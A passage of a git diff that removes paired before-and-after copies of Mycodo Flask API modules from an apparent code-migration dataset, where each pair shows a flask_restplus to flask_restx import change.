input_schema.dump(Input.query.all(), many=True) - - -@api.route('/users') -class Users(Resource): - """Interacts with User settings in the SQL database""" - @api.doc('dump_users') - @flask_login.login_required - def get(self): - """Dumps all User settings""" - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 - user_schema = UserSchema() - return user_schema.dump(User.query.all(), many=True) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.diff deleted file mode 100644 index 374c217..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/__init__.py b/mycodo/mycodo_flask/api/__init__.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/__init__.py - +++ b/mycodo/mycodo_flask/api/__init__.py -@@ -3,7 +3,7 @@ import logging - - from flask import Blueprint - from flask import make_response --from flask_restplus import Api -+from flask_restx import Api - - logger = logging.getLogger(__name__) - diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.source.py deleted file mode 100644 index 36e9078..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.source.py +++ /dev/null @@ -1,71 +0,0 @@ -# coding=utf-8 -import logging - 
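# The kizniche@mycodo api.py pair above shows the flask_restful ->
# flask_restplus move: Resource classes that flask_restful registers
# elsewhere via api.add_resource(...) instead gain an @api.route(...)
# decorator on a Blueprint-bound Api, and the manual per-row loop collapses
# into one marshmallow dump(..., many=True). A trimmed sketch under those
# assumptions; Items and the /items path are illustrative, not from the
# dataset:

from flask import Blueprint, Flask
from flask_restplus import Api, Resource

api_bp = Blueprint('api', __name__, url_prefix='/api')
api = Api(api_bp, version='1.0', title='Example API',
          description='An API for the example app')

@api.route('/items')
class Items(Resource):
    """Mirrors the migrated Resource shape from the diff above."""
    def get(self):
        # before: build a list by appending schema.dump(row) per row
        # after:  return schema.dump(rows, many=True) in a single call
        return []  # stand-in for ItemSchema().dump(Item.query.all(), many=True)

app = Flask(__name__)
app.register_blueprint(api_bp)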
-from flask import Blueprint -from flask import make_response -from flask_restplus import Api - -logger = logging.getLogger(__name__) - -api_blueprint = Blueprint('api', __name__, url_prefix='/api') - -authorizations = { - 'apikey': { - 'type': 'apiKey', - 'in': 'header', - 'name': 'X-API-KEY' - } -} - -default_responses = { - 200: 'Success', - 401: 'Invalid API Key', - 403: 'Insufficient Permissions', - 404: 'Not Found', - 422: 'Unprocessable Entity', - 429: 'Too Many Requests', - 500: 'Internal Server Error' -} - -api = Api( - api_blueprint, - version='1.0', - title='Mycodo API', - description='A REST API for Mycodo', - authorizations=authorizations, - default_mediatype='application/vnd.mycodo.v1+json' -) - -# Remove default accept header content type -if 'application/json' in api.representations: - del api.representations['application/json'] - -# Add API v1 + json accept content type -@api.representation('application/vnd.mycodo.v1+json') -def api_v1(data, code, headers): - if data is None: - data = {} - resp = make_response(data, code) - resp.headers.extend(headers) - return resp - -# To be used when v2 of the API is released -# @api.representation('application/vnd.mycodo.v2+json') -# def api_v2(data, code, headers): -# resp = make_response(data, code) -# resp.headers.extend(headers) -# return resp - - -def init_api(app): - import mycodo.mycodo_flask.api.choices - import mycodo.mycodo_flask.api.controller - import mycodo.mycodo_flask.api.daemon - import mycodo.mycodo_flask.api.input - import mycodo.mycodo_flask.api.math - import mycodo.mycodo_flask.api.measurement - import mycodo.mycodo_flask.api.output - import mycodo.mycodo_flask.api.pid - import mycodo.mycodo_flask.api.settings - - app.register_blueprint(api_blueprint) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.target.py deleted file mode 100644 index 53e63b7..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.target.py +++ /dev/null @@ -1,71 +0,0 @@ -# coding=utf-8 -import logging - -from flask import Blueprint -from flask import make_response -from flask_restx import Api - -logger = logging.getLogger(__name__) - -api_blueprint = Blueprint('api', __name__, url_prefix='/api') - -authorizations = { - 'apikey': { - 'type': 'apiKey', - 'in': 'header', - 'name': 'X-API-KEY' - } -} - -default_responses = { - 200: 'Success', - 401: 'Invalid API Key', - 403: 'Insufficient Permissions', - 404: 'Not Found', - 422: 'Unprocessable Entity', - 429: 'Too Many Requests', - 500: 'Internal Server Error' -} - -api = Api( - api_blueprint, - version='1.0', - title='Mycodo API', - description='A REST API for Mycodo', - authorizations=authorizations, - default_mediatype='application/vnd.mycodo.v1+json' -) - -# Remove default accept header content type -if 'application/json' in api.representations: - del api.representations['application/json'] - -# Add API v1 + json accept content type -@api.representation('application/vnd.mycodo.v1+json') -def api_v1(data, code, headers): - if data is None: - data = {} - resp = make_response(data, code) - resp.headers.extend(headers) - return resp - -# To be used when v2 of the API is released -# @api.representation('application/vnd.mycodo.v2+json') -# def api_v2(data, code, headers): -# resp = make_response(data, code) -# resp.headers.extend(headers) -# return resp - - -def init_api(app): - import mycodo.mycodo_flask.api.choices - import 
mycodo.mycodo_flask.api.controller - import mycodo.mycodo_flask.api.daemon - import mycodo.mycodo_flask.api.input - import mycodo.mycodo_flask.api.math - import mycodo.mycodo_flask.api.measurement - import mycodo.mycodo_flask.api.output - import mycodo.mycodo_flask.api.pid - import mycodo.mycodo_flask.api.settings - - app.register_blueprint(api_blueprint) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.diff deleted file mode 100644 index 13ca9a9..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/choices.py b/mycodo/mycodo_flask/api/choices.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/choices.py - +++ b/mycodo/mycodo_flask/api/choices.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import Input - from mycodo.databases.models import Math diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.source.py deleted file mode 100644 index a13db2f..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.source.py +++ /dev/null @@ -1,228 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import Input -from mycodo.databases.models import Math -from mycodo.databases.models import Measurement -from mycodo.databases.models import Output -from mycodo.databases.models import PID -from mycodo.databases.models import Unit -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general -from mycodo.utils.system_pi import add_custom_measurements -from mycodo.utils.system_pi import add_custom_units - -logger = logging.getLogger(__name__) - -ns_choices = api.namespace( - 'choices', description='Form choice operations') - -choices_item_value_fields = ns_choices.model('Choices Controller Fields', { - 'item': fields.String, - 'value': fields.String -}) - -choices_controllers_list_fields = ns_choices.model( - 'Choices Controller Fields List', { - 'choices controllers': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_inputs_measurements_list_fields = ns_choices.model( - 'Choices Inputs Measurements Fields List', { - 'choices inputs measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_maths_measurements_list_fields = ns_choices.model( - 'Choices Maths Measurements Fields List', { - 'choices maths measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_outputs_measurements_list_fields = ns_choices.model( - 'Choices Outputs Measurements Fields List', { - 'choices outputs measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - 
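# Every flask_restplus -> flask_restx hunk in these mycodo files touches only
# the import lines: flask-restx is the community fork of flask-restplus and
# keeps the same public surface (Api, Resource, abort, fields, namespaces,
# marshal_with). A minimal runnable sketch of the renamed imports; names like
# ns and item_fields are illustrative:

from flask import Blueprint
# before: from flask_restplus import Api, Resource, fields
from flask_restx import Api, Resource, fields

bp = Blueprint('api', __name__, url_prefix='/api')
api = Api(bp, version='1.0', title='Example API')
ns = api.namespace('choices', description='Form choice operations')

item_fields = ns.model('Item', {'item': fields.String, 'value': fields.String})

@ns.route('/items')
class Items(Resource):
    @ns.marshal_with(item_fields)
    def get(self):
        return {'item': 'example', 'value': '42'}  # marshalled per item_fields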
-choices_outputs_device_measurements_list_fields = ns_choices.model( - 'Choices Outputs Device Measurements Fields List', { - 'choices outputs devices': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_pids_measurements_list_fields = ns_choices.model( - 'Choices PIDs Measurements Fields List', { - 'choices pids measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - - -@ns_choices.route('/controllers') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesControllers(Resource): - """Form choices for controllers""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_controllers_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all controllers""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - choices_controllers = utils_general.choices_controller_ids() - return {'choices controllers': choices_controllers}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/inputs/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesInputMeasurements(Resource): - """Form choices for input measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_inputs_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all input measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - input_dev = Input.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - input_choices = utils_general.choices_inputs( - input_dev, dict_units, dict_measurements) - - if input_choices: - return {'choices inputs measurements': input_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/maths/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesMaths(Resource): - """Form choices for math measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_maths_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all math measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - math = Math.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - math_choices = utils_general.choices_maths( - math, dict_units, dict_measurements) - - if math_choices: - return {'choices maths measurements': math_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/outputs/devices') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesOutputDevices(Resource): - """Form choices for output devices""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_outputs_device_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all output devices""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - choices_output_devices = utils_general.choices_output_devices( - Output.query.all()) - return {'choices outputs devices': choices_output_devices}, 
200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/outputs/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesOutputMeasurements(Resource): - """Form choices for output measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_outputs_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all output measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - output = Output.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - output_choices = utils_general.choices_outputs( - output, dict_units, dict_measurements) - - if output_choices: - return {'choices outputs measurements': output_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/pids/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesPIDs(Resource): - """Form choices for pid measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_pids_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all PID measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - pid = PID.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - pid_choices = utils_general.choices_pids( - pid, dict_units, dict_measurements) - - if pid_choices: - return {'choices pids measurements': pid_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.target.py deleted file mode 100644 index f2668de..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.target.py +++ /dev/null @@ -1,228 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import Input -from mycodo.databases.models import Math -from mycodo.databases.models import Measurement -from mycodo.databases.models import Output -from mycodo.databases.models import PID -from mycodo.databases.models import Unit -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general -from mycodo.utils.system_pi import add_custom_measurements -from mycodo.utils.system_pi import add_custom_units - -logger = logging.getLogger(__name__) - -ns_choices = api.namespace( - 'choices', description='Form choice operations') - -choices_item_value_fields = ns_choices.model('Choices Controller Fields', { - 'item': fields.String, - 'value': fields.String -}) - -choices_controllers_list_fields = ns_choices.model( - 'Choices Controller Fields List', { - 'choices controllers': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_inputs_measurements_list_fields = ns_choices.model( - 'Choices Inputs Measurements Fields List', { 
- 'choices inputs measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_maths_measurements_list_fields = ns_choices.model( - 'Choices Maths Measurements Fields List', { - 'choices maths measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_outputs_measurements_list_fields = ns_choices.model( - 'Choices Outputs Measurements Fields List', { - 'choices outputs measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_outputs_device_measurements_list_fields = ns_choices.model( - 'Choices Outputs Device Measurements Fields List', { - 'choices outputs devices': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_pids_measurements_list_fields = ns_choices.model( - 'Choices PIDs Measurements Fields List', { - 'choices pids measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - - -@ns_choices.route('/controllers') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesControllers(Resource): - """Form choices for controllers""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_controllers_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all controllers""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - choices_controllers = utils_general.choices_controller_ids() - return {'choices controllers': choices_controllers}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/inputs/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesInputMeasurements(Resource): - """Form choices for input measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_inputs_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all input measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - input_dev = Input.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - input_choices = utils_general.choices_inputs( - input_dev, dict_units, dict_measurements) - - if input_choices: - return {'choices inputs measurements': input_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/maths/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesMaths(Resource): - """Form choices for math measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_maths_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all math measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - math = Math.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - math_choices = utils_general.choices_maths( - math, dict_units, dict_measurements) - - if math_choices: - return {'choices maths measurements': math_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/outputs/devices') -@ns_choices.doc(security='apikey', responses=default_responses) -class 
ChoicesOutputDevices(Resource): - """Form choices for output devices""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_outputs_device_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all output devices""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - choices_output_devices = utils_general.choices_output_devices( - Output.query.all()) - return {'choices outputs devices': choices_output_devices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/outputs/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesOutputMeasurements(Resource): - """Form choices for output measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_outputs_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all output measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - output = Output.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - output_choices = utils_general.choices_outputs( - output, dict_units, dict_measurements) - - if output_choices: - return {'choices outputs measurements': output_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/pids/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesPIDs(Resource): - """Form choices for pid measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_pids_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all PID measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - pid = PID.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - pid_choices = utils_general.choices_pids( - pid, dict_units, dict_measurements) - - if pid_choices: - return {'choices pids measurements': pid_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.diff deleted file mode 100644 index f904a8c..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/controller.py b/mycodo/mycodo_flask/api/controller.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/controller.py - +++ b/mycodo/mycodo_flask/api/controller.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.mycodo_client import DaemonControl - from mycodo.mycodo_flask.api import api diff --git 
a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.source.py deleted file mode 100644 index ace84d0..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.source.py +++ /dev/null @@ -1,80 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_controller = api.namespace( - 'controllers', description='Controller operations') - -controller_status_fields = ns_controller.model('Controller Status Fields', { - 'is_active': fields.Boolean -}) - -controller_set_fields = ns_controller.model('Controller Modulation Fields', { - 'activate': fields.Boolean( - description='Activate (1) or deactivate (0) a controller.', - required=True) -}) - - -@ns_controller.route('/<string:unique_id>') -@ns_controller.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the controller.' - } -) -class ControllerStatus(Resource): - """Controller status""" - - @accept('application/vnd.mycodo.v1+json') - @ns_controller.marshal_with(controller_status_fields) - @flask_login.login_required - def get(self, unique_id): - """Get the status of a controller""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - active = control.controller_is_active(unique_id) - return {'is_active': active}, 200 - except Exception: - abort(500, custom=traceback.format_exc()) - - @accept('application/vnd.mycodo.v1+json') - @ns_controller.expect(controller_set_fields) - @flask_login.login_required - def post(self, unique_id): - """Activate or deactivate a controller""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - if not ns_controller.payload or 'activate' not in ns_controller.payload: - abort(422, message='missing "activate" in payload') - - try: - control = DaemonControl() - if ns_controller.payload and ns_controller.payload['activate']: - activate = control.controller_activate(unique_id) - else: - activate = control.controller_deactivate(unique_id) - if activate[0]: - return {'message': activate[1]}, 460 - else: - return {'message': activate[1]}, 200 - except Exception: - abort(500, custom=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.target.py deleted file mode 100644 index 9466898..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.target.py +++ /dev/null @@ -1,80 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_controller = api.namespace( -
'controllers', description='Controller operations') - -controller_status_fields = ns_controller.model('Controller Status Fields', { - 'is_active': fields.Boolean -}) - -controller_set_fields = ns_controller.model('Controller Modulation Fields', { - 'activate': fields.Boolean( - description='Activate (1) or deactivate (0) a controller.', - required=True) -}) - - -@ns_controller.route('/<string:unique_id>') -@ns_controller.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the controller.' - } -) -class ControllerStatus(Resource): - """Controller status""" - - @accept('application/vnd.mycodo.v1+json') - @ns_controller.marshal_with(controller_status_fields) - @flask_login.login_required - def get(self, unique_id): - """Get the status of a controller""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - active = control.controller_is_active(unique_id) - return {'is_active': active}, 200 - except Exception: - abort(500, custom=traceback.format_exc()) - - @accept('application/vnd.mycodo.v1+json') - @ns_controller.expect(controller_set_fields) - @flask_login.login_required - def post(self, unique_id): - """Activate or deactivate a controller""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - if not ns_controller.payload or 'activate' not in ns_controller.payload: - abort(422, message='missing "activate" in payload') - - try: - control = DaemonControl() - if ns_controller.payload and ns_controller.payload['activate']: - activate = control.controller_activate(unique_id) - else: - activate = control.controller_deactivate(unique_id) - if activate[0]: - return {'message': activate[1]}, 460 - else: - return {'message': activate[1]}, 200 - except Exception: - abort(500, custom=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.diff deleted file mode 100644 index 4d9f3b6..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/daemon.py b/mycodo/mycodo_flask/api/daemon.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/daemon.py - +++ b/mycodo/mycodo_flask/api/daemon.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.mycodo_client import DaemonControl - from mycodo.mycodo_flask.api import api diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.source.py deleted file mode 100644 index 4a2ed84..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.source.py +++ /dev/null @@ -1,84 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import
default_responses -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_daemon = api.namespace('daemon', description='Daemon operations') - -daemon_status_fields = ns_daemon.model('Daemon Status Fields', { - 'is_running': fields.Boolean, - 'RAM': fields.Float, - 'python_virtual_env': fields.Boolean -}) - -daemon_terminate_fields = ns_daemon.model('Daemon Terminate Fields', { - 'terminated': fields.Boolean -}) - - -@ns_daemon.route('/') -@ns_daemon.doc(security='apikey', responses=default_responses) -class DaemonStatus(Resource): - """Checks information about the daemon""" - - @accept('application/vnd.mycodo.v1+json') - @ns_daemon.marshal_with(daemon_status_fields) - @flask_login.login_required - def get(self): - """Get the status of the daemon""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - status = control.daemon_status() - ram = control.ram_use() - virtualenv = control.is_in_virtualenv() - if status == 'alive': - return { - 'is_running': True, - 'RAM': ram, - 'python_virtual_env': virtualenv - }, 200 - except Exception: - return { - 'is_running': False, - 'RAM': None, - 'python_virtual_env': None - }, 200 - - -@ns_daemon.route('/terminate') -@ns_daemon.doc(security='apikey', responses=default_responses) -class DaemonTerminate(Resource): - """Checks information about the daemon""" - - @accept('application/vnd.mycodo.v1+json') - @ns_daemon.marshal_with(daemon_terminate_fields) - @flask_login.login_required - def post(self): - """Shut down the daemon""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - terminate = control.terminate_daemon() - if terminate: - return {'terminated': terminate}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.target.py deleted file mode 100644 index 5cf046c..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.target.py +++ /dev/null @@ -1,84 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_daemon = api.namespace('daemon', description='Daemon operations') - -daemon_status_fields = ns_daemon.model('Daemon Status Fields', { - 'is_running': fields.Boolean, - 'RAM': fields.Float, - 'python_virtual_env': fields.Boolean -}) - -daemon_terminate_fields = ns_daemon.model('Daemon Terminate Fields', { - 'terminated': fields.Boolean -}) - - -@ns_daemon.route('/') -@ns_daemon.doc(security='apikey', responses=default_responses) -class DaemonStatus(Resource): - """Checks information about the daemon""" - - @accept('application/vnd.mycodo.v1+json') - @ns_daemon.marshal_with(daemon_status_fields) - @flask_login.login_required - def get(self): - """Get the status of the daemon""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - status = control.daemon_status() - ram = 
